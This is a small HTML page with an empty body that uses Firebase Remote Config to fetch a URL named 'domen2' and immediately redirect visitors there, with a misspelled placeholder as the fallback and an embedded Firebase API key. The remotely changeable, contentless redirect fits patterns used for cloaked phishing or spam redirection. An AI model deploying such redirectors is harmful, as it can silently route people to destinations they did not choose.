<!DOCTYPE html>
<html>
<head>
  <script src="https://www.gstatic.com/firebasejs/10.0.0/firebase-app-compat.js"></script>
  <script src="https://www.gstatic.com/firebasejs/10.0.0/firebase-remote-config-compat.js"></script>
  <script>
    const app = firebase.initializeApp({
      projectId: "ice-cran-snow",
      apiKey: "AIzaSyB8Dx6MPYglxsnFCWbDkTqlx4Ioa3h4G_w"
    });

    const remoteConfig = firebase.remoteConfig();
    remoteConfig.defaultConfig = { domen2: "htt://yoursite.com" };

    remoteConfig.fetchAndActivate().then(() => {
      const url = remoteConfig.getValue("domen2").asString();
      if (url) window.location.replace(url);
    });
  </script>
</head>
<body></body>
</html>
